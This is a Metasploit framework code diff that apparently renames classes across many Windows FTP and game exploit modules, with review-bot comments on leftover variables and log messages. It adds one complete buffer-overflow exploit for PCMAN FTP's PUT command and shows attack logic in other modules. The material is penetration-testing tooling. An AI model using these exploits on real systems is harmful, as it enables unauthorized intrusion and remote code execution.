send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn) # Tell the FTP server to download our file 
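Review bot: In the `@@ -88,28 +88,28 @@` hunk of freefloatftp_wbem.rb the context line `peer = "#{rhost}:#{rport}"` survives although every `#{peer}` interpolation in the hunk is removed. The local now looks unused, and it shadows the `peer` name that the other hunk of this file read without a local assignment (presumably a framework helper). If nothing outside the hunk still reads it, the assignment should be deleted; the method body starts and ends outside the hunk, so that needs confirming. The same leftover assignment is visible in the `@@ -96,...` hunks of open_ftpd_wbem.rb and quickshare_traversal_write.rb.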
diff --git a/modules/exploits/windows/ftp/freeftpd_pass.rb b/modules/exploits/windows/ftp/freeftpd_pass.rb index d39a39495b..15638bd5ee 100644 --- a/modules/exploits/windows/ftp/freeftpd_pass.rb +++ b/modules/exploits/windows/ftp/freeftpd_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/freeftpd_user.rb b/modules/exploits/windows/ftp/freeftpd_user.rb index ff40940d5e..dfd218bd16 100644 --- a/modules/exploits/windows/ftp/freeftpd_user.rb +++ b/modules/exploits/windows/ftp/freeftpd_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb b/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb index 68b913acbc..4a3f5c083e 100644 --- a/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb +++ b/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/ftppad_list_reply.rb b/modules/exploits/windows/ftp/ftppad_list_reply.rb index f8fc0893db..51f8a6e1bd 100644 --- a/modules/exploits/windows/ftp/ftppad_list_reply.rb +++ b/modules/exploits/windows/ftp/ftppad_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Exploit::Remote::FtpServer 
diff --git a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb index 4f8df2009c..31744286f0 100644 --- a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb +++ b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/ftpsynch_list_reply.rb b/modules/exploits/windows/ftp/ftpsynch_list_reply.rb index 91809dba78..1a10e1d0e6 100644 --- a/modules/exploits/windows/ftp/ftpsynch_list_reply.rb +++ b/modules/exploits/windows/ftp/ftpsynch_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/gekkomgr_list_reply.rb b/modules/exploits/windows/ftp/gekkomgr_list_reply.rb index 754d9afd7e..43328997c2 100644 --- a/modules/exploits/windows/ftp/gekkomgr_list_reply.rb +++ b/modules/exploits/windows/ftp/gekkomgr_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/globalscapeftp_input.rb b/modules/exploits/windows/ftp/globalscapeftp_input.rb index 497c2049ad..57bb580aac 100644 --- a/modules/exploits/windows/ftp/globalscapeftp_input.rb +++ b/modules/exploits/windows/ftp/globalscapeftp_input.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp 
diff --git a/modules/exploits/windows/ftp/goldenftp_pass_bof.rb b/modules/exploits/windows/ftp/goldenftp_pass_bof.rb index e90f25e4ba..390c85c097 100644 --- a/modules/exploits/windows/ftp/goldenftp_pass_bof.rb +++ b/modules/exploits/windows/ftp/goldenftp_pass_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/httpdx_tolog_format.rb b/modules/exploits/windows/ftp/httpdx_tolog_format.rb index 5adb8fc2fb..4afa3776fd 100644 --- a/modules/exploits/windows/ftp/httpdx_tolog_format.rb +++ b/modules/exploits/windows/ftp/httpdx_tolog_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/kmftp_utility_cwd.rb b/modules/exploits/windows/ftp/kmftp_utility_cwd.rb index 2799facccc..bf75081bac 100644 --- a/modules/exploits/windows/ftp/kmftp_utility_cwd.rb +++ b/modules/exploits/windows/ftp/kmftp_utility_cwd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/leapftp_list_reply.rb b/modules/exploits/windows/ftp/leapftp_list_reply.rb index a27b61a9ed..824d7e0e35 100644 --- a/modules/exploits/windows/ftp/leapftp_list_reply.rb +++ b/modules/exploits/windows/ftp/leapftp_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb index b1b03bb545..a0be93b3b8 100644 
--- a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb +++ b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb b/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb index 9345aca081..a9cf6d302a 100644 --- a/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb +++ b/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/netterm_netftpd_user.rb b/modules/exploits/windows/ftp/netterm_netftpd_user.rb index e1404937dd..df8a083f4a 100644 --- a/modules/exploits/windows/ftp/netterm_netftpd_user.rb +++ b/modules/exploits/windows/ftp/netterm_netftpd_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/odin_list_reply.rb b/modules/exploits/windows/ftp/odin_list_reply.rb index 5d672e54ec..afe59385b0 100644 --- a/modules/exploits/windows/ftp/odin_list_reply.rb +++ b/modules/exploits/windows/ftp/odin_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/open_ftpd_wbem.rb b/modules/exploits/windows/ftp/open_ftpd_wbem.rb index 75d677b645..92f731b177 100644 --- a/modules/exploits/windows/ftp/open_ftpd_wbem.rb +++ b/modules/exploits/windows/ftp/open_ftpd_wbem.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp @@ -80,11 +80,11 @@ class Metasploit3 < Msf::Exploit::Remote case @stage when :exe - print_status("#{peer} - Sending executable (#{@exe.length.to_s} bytes)") + print_status("Sending executable (#{@exe.length.to_s} bytes)") cli.put(@exe) @stage = :mof when :mof - print_status("#{peer} - Sending MOF (#{@mof.length.to_s} bytes)") + print_status("Sending MOF (#{@mof.length.to_s} bytes)") cli.put(@mof) end @@ -96,14 +96,14 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 1) peer = "#{rhost}:#{rport}" - print_status("#{peer} - Trying to upload #{::File.basename(filename)}") + print_status("Trying to upload #{::File.basename(filename)}") conn = connect(false, datastore['VERBOSE']) if not conn fail_with(Failure::Unreachable, "#{@peer} - Connection failed") end # Switch to binary mode - print_status("#{peer} - Set binary mode") + print_status("Set binary mode") send_cmd(['TYPE', 'I'], true, conn) # Prepare active mode: Get attacker's IP and source port @@ -115,13 +115,13 @@ class Metasploit3 < Msf::Exploit::Remote src_port = "#{src_port/256},#{src_port.remainder(256)}" # Set to active mode - print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"") + print_status("Set active mode \"#{src_ip},#{src_port}\"") send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn) # Tell the FTP server to download our file send_cmd(['STOR', filename], false, conn) - print_good("#{peer} - Upload successful") + print_good("Upload successful") disconnect(conn) end diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb index 6bd6afcda3..592bad109b 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb 
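Review bot: The context line `fail_with(Failure::Unreachable, "#{@peer} - Connection failed")` in the `@@ -96,14 +96,14 @@` hunk of open_ftpd_wbem.rb interpolates the instance variable `@peer`, while the line just above assigns the local `peer`. Unless `@peer` is set somewhere outside the visible hunks, the message is printed with an empty prefix. Since this commit drops the hand-written prefix from every other message in the file, this line should follow: `fail_with(Failure::Unreachable, 'Connection failed')`. In the `@@ -115,13 +115,13 @@` hunk, `print_good("Upload successful")` follows the `STOR` command with no visible check of the server's reply, so the log may report success for a refused transfer.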
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb index 99b39220b0..aa1c8cb6d8 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/pcman_put.rb b/modules/exploits/windows/ftp/pcman_put.rb new file mode 100644 index 0000000000..0379c0c577 --- /dev/null +++ b/modules/exploits/windows/ftp/pcman_put.rb 
@@ -0,0 +1,80 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::Ftp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'PCMAN FTP Server Buffer Overflow - PUT Command',
+ 'Description' => %q{
+ This module exploits a buffer overflow vulnerability found in the PUT command of the
+ PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
+ credientials are enabled.
+ },
+ 'Author' =>
+ [
+ 'Jay Turla', # Initial Discovery -- @shipcod3
+ 'Chris Higgins' # msf Module -- @ch1gg1ns
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'EDB', '37731'],
+ [ 'OSVDB', '94624']
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process'
+ },
+ 'Payload' =>
+ {
+ 'Space' => 1000,
+ 'BadChars' => "\x00\x0A\x0D",
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Windows XP SP3 English',
+ {
+ 'Ret' => 0x77c35459, # push esp ret C:\WINDOWS\system32\msvcrt.dll
+ 'Offset' => 2007
+ }
+ ],
+ ],
+ 'DisclosureDate' => 'Aug 07 2015',
+ 'DefaultTarget' => 0))
+ end
+
+ def check
+ connect_login
+ disconnect
+
+ if /220 PCMan's FTP Server 2\.0/ === banner
+ Exploit::CheckCode::Appears
+ else
+ Exploit::CheckCode::Safe
+ end
+ end
+
+
+ def exploit
+ connect_login
+
+ print_status('Generating payload...')
+ sploit = rand_text_alpha(target['Offset'])
+ sploit << [target.ret].pack('V')
+ sploit << make_nops(16)
+ sploit << payload.encoded
+
+ send_cmd( ["PUT", sploit], false )
+ disconnect
+ end
+
+end
diff --git a/modules/exploits/windows/ftp/pcman_stor.rb b/modules/exploits/windows/ftp/pcman_stor.rb
index 10ea810e86..9ec9e76e93 100644
--- a/modules/exploits/windows/ftp/pcman_stor.rb
+++ b/modules/exploits/windows/ftp/pcman_stor.rb
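Review bot: `check` in the new pcman_put.rb returns `Exploit::CheckCode::Appears` on a banner match that pins only `2\.0`, while the Description names v2.0.7, so the result claims more than the banner shows. Unless that banner is known to be unique to the affected build, `Exploit::CheckCode::Detected` is the more accurate result for a banner-only match. `check` also runs `connect_login` although only `banner` is read afterwards, so the credentials are sent for a test that does not appear to need them. The Description text has a typo: `credientials` should read `credentials`.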
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/proftp_banner.rb b/modules/exploits/windows/ftp/proftp_banner.rb index 91cf132b9e..c5565db2f1 100644 --- a/modules/exploits/windows/ftp/proftp_banner.rb +++ b/modules/exploits/windows/ftp/proftp_banner.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/quickshare_traversal_write.rb b/modules/exploits/windows/ftp/quickshare_traversal_write.rb index a051ee3057..343134c41c 100644 --- a/modules/exploits/windows/ftp/quickshare_traversal_write.rb +++ b/modules/exploits/windows/ftp/quickshare_traversal_write.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp @@ -79,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote case @stage when :exe - print_status("#{peer} - Sending executable (#{@exe.length.to_s} bytes)") + print_status("Sending executable (#{@exe.length.to_s} bytes)") cli.put(@exe) @stage = :mof when :mof - print_status("#{peer} - Sending MOF (#{@mof.length.to_s} bytes)") + print_status("Sending MOF (#{@mof.length.to_s} bytes)") cli.put(@mof) end @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 1) peer = "#{rhost}:#{rport}" - print_status("#{peer} - Trying to upload #{::File.basename(filename)}") + print_status("Trying to upload #{::File.basename(filename)}") # We can't use connect_login, because it cannot determine a successful login correctly. # For example: The server actually returns a 503 (Bad Sequence of Commands) when the 
@@ -106,18 +106,18 @@ class Metasploit3 < Msf::Exploit::Remote res = send_user(datastore['FTPUSER'], conn) if res !~ /^(331|2)/ - vprint_error("#{peer} - The server rejected our username: #{res.to_s}") + vprint_error("The server rejected our username: #{res.to_s}") return false end res = send_pass(datastore['FTPPASS'], conn) if res !~ /^(2|503)/ - vprint_error("#{peer} - The server rejected our password: #{res.to_s}") + vprint_error("The server rejected our password: #{res.to_s}") return false end # Switch to binary mode - print_status("#{peer} - Set binary mode") + print_status("Set binary mode") send_cmd(['TYPE', 'I'], true, conn) # Prepare active mode: Get attacker's IP and source port @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote src_port = "#{src_port/256},#{src_port.remainder(256)}" # Set to active mode - print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"") + print_status("Set active mode \"#{src_ip},#{src_port}\"") send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn) # Tell the FTP server to download our file diff --git a/modules/exploits/windows/ftp/ricoh_dl_bof.rb b/modules/exploits/windows/ftp/ricoh_dl_bof.rb index 2977243b78..0d36500d61 100644 --- a/modules/exploits/windows/ftp/ricoh_dl_bof.rb +++ b/modules/exploits/windows/ftp/ricoh_dl_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb index c07761fbd2..ffc7d788f1 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_list.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::Remote::Ftp 
diff --git a/modules/exploits/windows/ftp/sami_ftpd_user.rb b/modules/exploits/windows/ftp/sami_ftpd_user.rb index 48bdbf0d8a..6f204555fd 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_user.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_user.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ftp/sasser_ftpd_port.rb b/modules/exploits/windows/ftp/sasser_ftpd_port.rb index 0499103f04..42d0bf5062 100644 --- a/modules/exploits/windows/ftp/sasser_ftpd_port.rb +++ b/modules/exploits/windows/ftp/sasser_ftpd_port.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/scriptftp_list.rb b/modules/exploits/windows/ftp/scriptftp_list.rb index 0c8492f50e..13c7fdf422 100644 --- a/modules/exploits/windows/ftp/scriptftp_list.rb +++ b/modules/exploits/windows/ftp/scriptftp_list.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, }, 'Payload' => { diff --git a/modules/exploits/windows/ftp/seagull_list_reply.rb b/modules/exploits/windows/ftp/seagull_list_reply.rb index eaf8b779f9..a3bfa6be94 100644 --- a/modules/exploits/windows/ftp/seagull_list_reply.rb +++ b/modules/exploits/windows/ftp/seagull_list_reply.rb 
@@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/servu_chmod.rb b/modules/exploits/windows/ftp/servu_chmod.rb index 3439995d2c..6d5bcdc0ca 100644 --- a/modules/exploits/windows/ftp/servu_chmod.rb +++ b/modules/exploits/windows/ftp/servu_chmod.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Egghunter diff --git a/modules/exploits/windows/ftp/servu_mdtm.rb b/modules/exploits/windows/ftp/servu_mdtm.rb index 75c3f1fa63..eb547b3b9a 100644 --- a/modules/exploits/windows/ftp/servu_mdtm.rb +++ b/modules/exploits/windows/ftp/servu_mdtm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/slimftpd_list_concat.rb b/modules/exploits/windows/ftp/slimftpd_list_concat.rb index dca878528b..5be79c2078 100644 --- a/modules/exploits/windows/ftp/slimftpd_list_concat.rb +++ b/modules/exploits/windows/ftp/slimftpd_list_concat.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/trellian_client_pasv.rb b/modules/exploits/windows/ftp/trellian_client_pasv.rb index de59a26cc6..0ed324112a 100644 --- a/modules/exploits/windows/ftp/trellian_client_pasv.rb +++ b/modules/exploits/windows/ftp/trellian_client_pasv.rb 
@@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/turboftp_port.rb b/modules/exploits/windows/ftp/turboftp_port.rb index 92ff75127d..57a026c205 100644 --- a/modules/exploits/windows/ftp/turboftp_port.rb +++ b/modules/exploits/windows/ftp/turboftp_port.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb index b587adc4f6..18fc0971bb 100644 --- a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb +++ b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/warftpd_165_pass.rb b/modules/exploits/windows/ftp/warftpd_165_pass.rb index 1b8205a688..7c797946c4 100644 --- a/modules/exploits/windows/ftp/warftpd_165_pass.rb +++ b/modules/exploits/windows/ftp/warftpd_165_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/warftpd_165_user.rb b/modules/exploits/windows/ftp/warftpd_165_user.rb index 3dbe048b51..4337793eac 100644 --- a/modules/exploits/windows/ftp/warftpd_165_user.rb +++ b/modules/exploits/windows/ftp/warftpd_165_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp 
diff --git a/modules/exploits/windows/ftp/wftpd_size.rb b/modules/exploits/windows/ftp/wftpd_size.rb index 1542008c2b..109c13a220 100644 --- a/modules/exploits/windows/ftp/wftpd_size.rb +++ b/modules/exploits/windows/ftp/wftpd_size.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb index 5b80f89d7f..e333456c17 100644 --- a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb +++ b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::CmdStager include Msf::Exploit::Remote::HttpClient @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote password = datastore['PASSWORD'] @session_cookie = authenticate(username, password) - print_status("#{peer} - Sending payload") + print_status("Sending payload") # Execute the cmdstager, max length of the commands is ~1500 execute_cmdstager(flavor: :vbs, linemax: 1500) end @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote end def authenticate(username, password) - print_status("#{peer} - Authenticating") + print_status("Authenticating") res = send_request_cgi( 'uri' => '/admin_loginok.html', 'method' => 'POST', diff --git a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb index d5bcefe4af..4ecd12e46f 100644 --- a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb +++ b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp 
diff --git a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb index aef6f65f7d..e73dc1f1e4 100644 --- a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb +++ b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/xftp_client_pwd.rb b/modules/exploits/windows/ftp/xftp_client_pwd.rb index e4a300eca7..56db38b8d8 100644 --- a/modules/exploits/windows/ftp/xftp_client_pwd.rb +++ b/modules/exploits/windows/ftp/xftp_client_pwd.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/xlink_client.rb b/modules/exploits/windows/ftp/xlink_client.rb index 3ae6ee1c56..fac246c6f9 100644 --- a/modules/exploits/windows/ftp/xlink_client.rb +++ b/modules/exploits/windows/ftp/xlink_client.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/xlink_server.rb b/modules/exploits/windows/ftp/xlink_server.rb index 3b3d16a5ae..89ce3fd299 100644 --- a/modules/exploits/windows/ftp/xlink_server.rb +++ b/modules/exploits/windows/ftp/xlink_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/games/mohaa_getinfo.rb b/modules/exploits/windows/games/mohaa_getinfo.rb index 406afdf4dc..6589171d8d 100644 
--- a/modules/exploits/windows/games/mohaa_getinfo.rb +++ b/modules/exploits/windows/games/mohaa_getinfo.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/games/racer_503beta5.rb b/modules/exploits/windows/games/racer_503beta5.rb index e5dc86d847..5a4354bc73 100644 --- a/modules/exploits/windows/games/racer_503beta5.rb +++ b/modules/exploits/windows/games/racer_503beta5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/games/ut2004_secure.rb b/modules/exploits/windows/games/ut2004_secure.rb index c586e98158..e0349a6926 100644 --- a/modules/exploits/windows/games/ut2004_secure.rb +++ b/modules/exploits/windows/games/ut2004_secure.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb 